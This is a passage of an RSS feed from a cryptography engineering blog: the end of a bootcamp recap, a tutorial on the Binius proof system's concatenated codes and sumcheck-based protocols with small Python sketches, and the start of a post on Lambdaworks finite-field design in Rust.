&lt;p&gt;There is still ongoing work on multivariate polynomials (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;726&quot;&gt;PR-726&lt;&#x2F;a&gt;), the Sumcheck Protocol (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;739&quot;&gt;PR-739&lt;&#x2F;a&gt;), inner product arguments (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;743&quot;&gt;PR-743&lt;&#x2F;a&gt;), adding the BN254 elliptic curve (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;646&quot;&gt;PR-646&lt;&#x2F;a&gt;), and an adapter for Circom (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;752&quot;&gt;PR-752&lt;&#x2F;a&gt;).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;hacking-in-buenos-aires-and-visiting-friends-abroad&quot;&gt;Hacking in Buenos Aires and visiting friends abroad&lt;&#x2F;h2&gt;
&lt;p&gt;During the first weeks of December, we hosted an event and hacking house in Buenos Aires, where we received many engineers, researchers, and friends. It was a great opportunity to meet in person, discuss cryptography, distributed systems, and engineering, and have a good time. We also had the opportunity to visit several landmarks in the city and outskirts, enjoy asados and dinners, and take a short trip to the city of Bariloche.&lt;&#x2F;p&gt;
&lt;p&gt;We also met many bootcampers at several events we participated in, such as DevConnect in Istanbul or the ZK Summit.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;next-steps&quot;&gt;Next steps&lt;&#x2F;h2&gt;
&lt;p&gt;We have greatly enjoyed the whole experience and are grateful to our bootcampers for their commitment and hard work. We have learned a lot from them and the experience, and this will help us improve our hacking learning path to cryptography and zero-knowledge proofs. We will take more time to analyze the whole experience and we will be releasing new blog posts on different proof systems and how to use the different tools and features in Lambdaworks.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>SNARKs on binary fields: Binius - Part 2</title>
          <pubDate>Fri, 05 Jan 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/binius-part-2/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/binius-part-2/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/binius-part-2/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;This post is a continuation of our discussion on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gitlab.com&#x2F;UlvetannaOSS&#x2F;binius&quot;&gt;Binius&lt;&#x2F;a&gt;, a new proof system that works over binary fields. Before continuing, see the &lt;a href=&quot;&#x2F;snarks-on-binary-fields-binius&#x2F;&quot;&gt;first part&lt;&#x2F;a&gt; if you are unfamiliar with some of the concepts or &lt;a href=&quot;&#x2F;binius-moving-zk-forward&#x2F;&quot;&gt;our post&lt;&#x2F;a&gt; on why we think this proof system can help move the industry forward.&lt;&#x2F;p&gt;
&lt;p&gt;In this part, we will focus on the concatenated codes (which will allow us to extend the polynomial commitment scheme for small fields) and the different protocols to check statements over multivariate polynomials.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;concatenated-codes&quot;&gt;Concatenated Codes&lt;&#x2F;h2&gt;
&lt;p&gt;In our previous post, we covered the polynomial commitment scheme for small fields. To develop the general commitment scheme, we first need to introduce the packing scheme and concatenated codes. Remember that in this setting we are working with a tower of fields, $\tau_0 \subset \tau_1 \subset \dots \subset \tau_t$. We work with an $[n_0 , k_0 , d_0]$ linear outer code and an $[n_i , k_i , d_i]$ linear inner code. The outer code works over $\tau_{i + k}$, while the inner code works over $\tau_i$.&lt;&#x2F;p&gt;
&lt;p&gt;The whole construction depends on packing several elements from a field and interpreting them as elements of an extension field. We can view $2^k$ elements from $\tau_i$ as a single element from $\tau_{i + k}$, since $\tau_{i + k}$ is a vector space over $\tau_i$, just as we can view the complex numbers as a two-dimensional vector space over the real numbers.&lt;&#x2F;p&gt;
&lt;p&gt;The concatenated code’s encoding procedure works as follows:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Pack the initial message over $\tau_i$ into elements of $\tau_{i+k}$. For example, if we have four bits from $\tau_0$, $0, 1, 1, 1$, we can group them as the element $0111$ from $\tau_2$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Encode the packed message using the outer code. For example, we can use Reed-Solomon encoding.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Unpack each symbol in the codeword into a message over $\tau_i$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Encode using the inner code and concatenate the elements. This encoding may be the trivial one, that is, applying the identity code.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
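&lt;p&gt;The packing in step 1 can be sketched in a few lines. This is an illustrative snippet (not lambdaworks or Binius code), treating an element of $\tau_k$ as an integer whose bits are the packed $\tau_0$ symbols:&lt;&#x2F;p&gt;

```python
def pack(symbols, k):
    """Pack 2^k binary symbols (tau_0 elements) into one tau_k element,
    represented as the integer whose bits are the original symbols."""
    assert len(symbols) == 2 ** k
    value = 0
    for s in symbols:
        value = value * 2 + s  # append one bit (avoiding bitwise operators)
    return value

def unpack(value, k):
    """Inverse of pack: split one tau_k element back into its 2^k bits."""
    bits = []
    for _ in range(2 ** k):
        bits.append(value % 2)
        value = value // 2
    return list(reversed(bits))

# The post's example: bits 0, 1, 1, 1 from tau_0 become 0b0111 = 7 in tau_2.
packed = pack([0, 1, 1, 1], 2)
assert packed == 7
assert unpack(packed, 2) == [0, 1, 1, 1]
```

&lt;p&gt;The same idea applies one level up the tower: $2^k$ elements of $\tau_i$ become one element of $\tau_{i+k}$ by concatenating their bit representations.&lt;&#x2F;p&gt;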
&lt;p&gt;One problem we face is that we have to use the extension code. We have an interplay between different fields: the field representing the coefficients of the polynomial, the field for the alphabet of the code, the intermediate field, and the extension field which we use for cryptographic security (here, $\tau_t$). To work with the extension code, we define a structure containing elements from $\tau_i$ in a rectangular array (of $2^{t - i} \times 2^k$ elements). Each row contains $2^k$ elements, which can be interpreted as a $\tau_{i + k}$ element. Analogously, the $2^{t - i}$ elements in a column can be interpreted as a single element in $\tau_t$. The structure has a dual view: as a vector space over $\tau_t$ of dimension $2^k$ (viewing the columns) or as a vector space over $\tau_{i + k}$ of dimension $2^{t - i}$ (viewing the rows). Multiplication of the array by an element from $\tau_i$ is done elementwise. If we want to multiply by an element of $\tau_t$, we take each column (which is a single element from $\tau_t$) and multiply it by the element. Analogously, we can multiply by an element in $\tau_{i + k}$ by multiplying each row.&lt;&#x2F;p&gt;
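&lt;p&gt;The dual view of the array can be made concrete with a small sketch. The sizes below ($i = 0$, $k = 2$, $t = 3$) are made up for illustration: the same bit array yields $2^{t-i}$ row elements over $\tau_{i+k}$ or $2^k$ column elements over $\tau_t$.&lt;&#x2F;p&gt;

```python
import random

random.seed(0)
ROWS, COLS = 8, 4  # a 2^(t-i) x 2^k array with i = 0, k = 2, t = 3
array = [[random.randint(0, 1) for _ in range(COLS)] for _ in range(ROWS)]

def pack_bits(bits):
    """Interpret a list of bits as a single integer (one tower-field element)."""
    value = 0
    for b in bits:
        value = value * 2 + b
    return value

# Row view: 2^(t-i) = 8 elements of tau_(i+k) = tau_2 (each row is 4 bits).
row_view = [pack_bits(row) for row in array]
# Column view: 2^k = 4 elements of tau_t = tau_3 (each column is 8 bits).
col_view = [pack_bits([array[r][c] for r in range(ROWS)]) for c in range(COLS)]

assert len(row_view) == 8 and len(col_view) == 4
```

&lt;p&gt;Multiplying the array by a $\tau_t$ element would act column by column on &lt;code&gt;col_view&lt;&#x2F;code&gt;, while multiplying by a $\tau_{i+k}$ element would act row by row on &lt;code&gt;row_view&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;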
&lt;p&gt;The block level encoding-based polynomial commitment scheme’s procedure is:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Commit($p$): Arrange the coefficients of the polynomial into an $m_0 \times m_1$ matrix, with entries in $\tau_i$. Group the elements taking chunks of $2^k$, interpret them as elements in $\tau_{i + k}$, and apply the extended encoding row-wise, obtaining a matrix of size $m_0 \times n$ with elements over $\tau_t$. Build a Merkle tree from the columns and output the root as commitment.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Prove($p$,$s$): The prover arranges the coefficients into an $m_0 \times m_1$ matrix $t$ with entries in $\tau_i$. The prover computes and sends in the clear $t^\prime = \otimes_{ i = l_1 }^\ell (1 - r_i , r_i ) \cdot t$ to the verifier. The verifier samples $\rho$ indexes $j_0 , j_1 , \dots , j_{\rho - 1}$. The prover sends the columns of the encoded matrix $U$ with their accompanying Merkle paths.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Verify($\pi , r , s$): The verifier checks that $t^\prime \cdot \otimes_{ i = 0}^{l_1 - 1} (1 - r_i , r_i ) = s$. Then, the verifier interprets $t^\prime$ as chunks of size $2^k$ and applies the extended code, unpacking all the elements to get $u^\prime$. The verifier checks that all the columns supplied are included in the Merkle tree, and that $\otimes_{ i = l_1 }^\ell ( 1 - r_i , r_i ) \cdot u_j = u^\prime_j$ at each sampled column $j$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The size of the proof can be calculated from $t^\prime$ ($m_1$ elements from $\tau_t$), the columns (consisting of $\rho m_0$ elements from $\tau_{i + k}$), plus the authentication paths for the $\rho$ columns. Assuming a digest size of $256$ bits, we have $2^t m_1 + 2^{i + k} \rho m_0 + 2^8 \rho \log_2 {n}$ bits.&lt;&#x2F;p&gt;
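&lt;p&gt;As a sanity check, the size formula is easy to evaluate. The parameter values below are invented purely for illustration:&lt;&#x2F;p&gt;

```python
import math

def proof_size_bits(t, i, k, m0, m1, n, rho, digest_bits=256):
    """Proof size per the formula in the text:
    t-prime (m1 elements of tau_t), rho opened columns (m0 elements
    of tau_(i+k) each), plus rho Merkle authentication paths."""
    t_prime = (2 ** t) * m1
    columns = (2 ** (i + k)) * rho * m0
    paths = digest_bits * rho * math.ceil(math.log2(n))
    return t_prime + columns + paths

# Hypothetical parameters: 128-bit field elements would use t = 7, etc.
size = proof_size_bits(t=7, i=0, k=4, m0=64, m1=64, n=512, rho=32)
assert size == 114688  # 8192 + 32768 + 73728 bits, i.e. 14 KiB
```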
&lt;h2 id=&quot;protocols&quot;&gt;Protocols&lt;&#x2F;h2&gt;
&lt;p&gt;Binius contains a list of key polynomial predicates, based on those proposed by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1355.pdf&quot;&gt;HyperPlonk&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Query&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Sum&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Zero&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Product&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Multiset&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. Permutation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. LookUp&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Almost all of the protocols boil down to a sumcheck. For the basics of the sumcheck protocol, see our &lt;a href=&quot;&#x2F;have-you-checked-your-sums&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt; or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;people.cs.georgetown.edu&#x2F;jthaler&#x2F;ProofsArgsAndZK.pdf&quot;&gt;Thaler’s book&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The zerocheck protocol is useful, for example, to prove that the gate constraints are enforced in HyperPlonk. In that protocol, we have a multilinear polynomial $M$ (which encodes the trace) and selector multilinear polynomials $S_1$, $S_2$, $S_3$, such that, for every point in ${0, 1 }^n$, we have&lt;br &#x2F;&gt;
$0 = S_1 (M_0 + M_1 ) + S_2 M_0 M_1 + S_3 G(M_0 ,M_1 ) - M_2 + I$&lt;br &#x2F;&gt;
where $M_0 (x) = M(0,0,x)$, $M_1 (x) = M(0,1,x)$, and $M_2 (x) = M(1,0,x)$.&lt;&#x2F;p&gt;
&lt;p&gt;How can we prove that the multivariate polynomial, $P = S_1 (M_0 + M_1 ) + S_2 M_0 M_1 + S_3 G(M_0 ,M_1 ) - M_2 + I$ is equal to zero for every value in ${0, 1 }^n$ ? We let the verifier supply a random point $r_{zc}$ from $\mathbb{F}^n$ and build the multivariate polynomial&lt;br &#x2F;&gt;
$P^\prime (x) = eq(r_{zc} , x) P(x)$&lt;br &#x2F;&gt;
with $eq(x,y) = \prod ( x_i y_i + (1 - x_i ) (1 - y_i ))$ and we run the sumcheck protocol for $P^\prime (x)$, using as sum value $0$. The verifier will only need to do one evaluation of $P^\prime (x)$ at $x = r_{s}$.&lt;&#x2F;p&gt;
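&lt;p&gt;The zerocheck reduction above can be sketched over a toy prime field. This is an illustrative snippet (the field size and the example polynomial are made up; this is not code from the Binius repo):&lt;&#x2F;p&gt;

```python
import itertools

P = 97  # a small prime field, for illustration only

def eq(xs, ys):
    """eq(x, y) = prod(x_i y_i + (1 - x_i)(1 - y_i)).
    On boolean inputs it is the indicator function of x == y."""
    acc = 1
    for x, y in zip(xs, ys):
        acc = acc * (x * y + (1 - x) * (1 - y)) % P
    return acc

assert eq([0, 1, 1], [0, 1, 1]) == 1
assert eq([0, 1, 1], [1, 1, 1]) == 0

def sum_eq_weighted(poly, r, n):
    """Sum of eq(r, x) * poly(x) over the boolean cube {0,1}^n.
    If poly vanishes on the whole cube, this sum is 0 for any r."""
    total = 0
    for x in itertools.product([0, 1], repeat=n):
        total = (total + eq(r, x) * poly(x)) % P
    return total

# poly(x) = x0 * (1 - x0) vanishes on {0,1}^n, so the sum is 0 for a random r:
assert sum_eq_weighted(lambda x: x[0] * (1 - x[0]) % P, [13, 42, 7], 3) == 0
```

&lt;p&gt;Running the sumcheck on $eq(r_{zc}, x) P(x)$ with claimed sum $0$ is exactly the zerocheck reduction described above.&lt;&#x2F;p&gt;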
&lt;p&gt;The use of the sumcheck with $P^\prime (x)$ involves multivariate polynomials which are not multilinear; this means that the prover has to send at each round a polynomial of at most degree $d$. HyperPlonk has an optimization for this case: the prover sends a commitment to a univariate polynomial of degree at most $d$ and provides an evaluation at a single point (instead of at least 3 points).&lt;&#x2F;p&gt;
&lt;p&gt;Since most of the protocols end up in a sumcheck, we can batch the polynomials using a random linear combination and reduce all the checks to a single sumcheck. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gitlab.com&#x2F;UlvetannaOSS&#x2F;binius&#x2F;-&#x2F;tree&#x2F;main?ref_type=heads&quot;&gt;Binius’s repo&lt;&#x2F;a&gt; contains the implementation of the zero, sum and evaluation checks.&lt;&#x2F;p&gt;
&lt;p&gt;Binius proposes the use of Plonkish arithmetization; the main difference with HyperPlonk lies in the fact that the trace contains elements belonging to different subfields. Therefore, the gate constraints will express relations over different subfields. An execution is valid if&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. All gate constraints hold.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. All global copy constraints are satisfied.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Every witness variable lies inside its prescribed subfield.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The first two conditions hold for any of the variants of Plonk; the last one is introduced because we work with extension towers.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusions&quot;&gt;Conclusions&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we covered how the commitment scheme developed in the first part is extended to work with packed fields. We can view arrays of field elements in a dual way, packing the elements column- or row-wise. The paper later presents some key protocols to prove predicates over polynomials, such as evaluation, sum, and product checks; these boil down to doing several sumchecks, which can be batched conveniently. These, together with an arithmetization scheme (such as Plonkish), can be used to yield a SNARK. The main difference between HyperPlonk and Binius lies in the fact that the trace elements in Binius may belong to different subfields. However, this does not add a new check; rather, it could replace what would be additional checks in HyperPlonk. These subfield checks are guaranteed by the security property of the small-field polynomial commitment scheme.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Lambdaworks Design and Usage: Part 1 - Finite Fields</title>
          <pubDate>Tue, 02 Jan 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-design-and-usage-part-1-finite-fields/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-design-and-usage-part-1-finite-fields/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-design-and-usage-part-1-finite-fields/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;In this series of blog posts, we will see how Lambdaworks is implemented and the standard tools needed to develop provers. This first part will briefly overview the library and then focus on the finite field design and usage.&lt;&#x2F;p&gt;
&lt;p&gt;Lambdaworks at its core is a library to create proving systems, and a collection of associated provers and verifiers ready to use. In this blog post, we will explore the building blocks of the proving systems and the Lambdaworks library.&lt;&#x2F;p&gt;
&lt;p&gt;The most relevant sections of the library are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Math&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Crypto&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Provers&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Provers has a collection of proof systems. Crypto contains some primitives like MSM, hashes, and Merkle trees. Math has logic related to finite fields and elliptic curves.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;math&quot;&gt;Math&lt;&#x2F;h2&gt;
&lt;p&gt;At the core of the Math library are finite fields, the main building block of all the constructions we use in Lambdaworks.&lt;&#x2F;p&gt;
&lt;p&gt;The basic structure is designed under a relationship between a &lt;code&gt;Field&lt;&#x2F;code&gt; and its &lt;code&gt;FieldElement&lt;&#x2F;code&gt;. Let’s see how it works.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;field-and-elements-main-ideas&quot;&gt;Field and Elements: Main Ideas&lt;&#x2F;h3&gt;
&lt;p&gt;A &lt;code&gt;Field&lt;&#x2F;code&gt; is an abstract definition. It knows the modulus and defines how the operations are performed.&lt;&#x2F;p&gt;
&lt;p&gt;We usually create a new &lt;code&gt;Field&lt;&#x2F;code&gt; by instantiating an optimized backend. For example, this is the definition of the Pallas field:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; 4 is the number of 64-bit limbs needed to represent the field&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;type PallasMontgomeryBackendPrimeField&amp;lt;T&amp;gt; = MontgomeryBackendPrimeField&amp;lt;T, 4&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#[derive(Debug, Clone, PartialEq, Eq)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct MontgomeryConfigPallas255PrimeField;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl IsModulus&amp;lt;U256&amp;gt; for MontgomeryConfigPallas255PrimeField {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    const MODULUS: U256 = U256::from_hex_unchecked(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;quot;40000000000000000000000000000000224698fc094cf91b992d30ed00000001&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub type Pallas255PrimeField =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    PallasMontgomeryBackendPrimeField&amp;lt;MontgomeryConfigPallas255PrimeField&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As can be seen, it is enough to define its modulus and instantiate it over a &lt;code&gt;PallasMontgomeryBackendPrimeField&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Internally, it resolves all the constants needed and creates all the required operations for the field. Notice that there are no macros involved. This holds for all the Lambdaworks code.&lt;&#x2F;p&gt;
&lt;p&gt;Generics and traits are the only tools used to achieve genericity. This makes it easier for the compiler to suggest possible functions to call, and the resulting code is easier to follow. Moreover, minimal traits are used to keep the code simple.&lt;&#x2F;p&gt;
&lt;p&gt;Back to the fields, you will notice that other backends can be more efficient for some fields. For example, Mersenne31 and Goldilocks are defined over their own specialized backends.&lt;&#x2F;p&gt;
&lt;p&gt;Back to the usage, suppose we want to create a &lt;code&gt;FieldElement&lt;&#x2F;code&gt;. This is as easy as instantiating the &lt;code&gt;FieldElement&lt;&#x2F;code&gt; over a &lt;code&gt;Field&lt;&#x2F;code&gt; and calling a &lt;code&gt;from_hex&lt;&#x2F;code&gt; function.&lt;&#x2F;p&gt;
&lt;p&gt;For example:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let an_element = FieldElement::&amp;lt;Stark252PrimeField&amp;gt;::from_hex_unchecked(&amp;quot;030e480bed5fe53fa909cc0f8c4d99b8f9f2c016be4c41e13a4848797979c662&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Notice we can alias the &lt;code&gt;FieldElement&lt;&#x2F;code&gt; to something like&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;type FE = FieldElement::&amp;lt;Stark252PrimeField&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;if we want to shorten the code and do not care about being explicit with the field.&lt;&#x2F;p&gt;
&lt;p&gt;Once we have a field, we can perform all the usual operations. We usually suggest working with references, but copies work too.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let field_a = FE::from_hex(&amp;quot;3&amp;quot;).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let field_b = FE::from_hex(&amp;quot;7&amp;quot;).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; We can use pointers to avoid copying the values internally&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let operation_result = &amp;amp;field_a * &amp;amp;field_b;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; But all the combinations of pointers and values work&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let operation_result = field_a * field_b;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Sometimes, optimized operations are preferred. For example,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; We can compute a square by multiplying a number by itself&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let squared = &amp;amp;field_a * &amp;amp;field_a;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Using exponentiation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let squared = field_a.pow(FE::from_hex(&amp;quot;2&amp;quot;).unwrap());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Or using an optimized function&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let squared = field_a.square();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;all compute the square of a number, but performance-wise, there is quite a big difference.&lt;&#x2F;p&gt;
&lt;p&gt;Some useful instantiation methods are also provided for common constants and for cases where const functions can be called. This is useful when creating functions that do not rely on the &lt;code&gt;IsField&lt;&#x2F;code&gt; trait, since Rust does not support const functions in traits yet:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Defined for all field elements&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
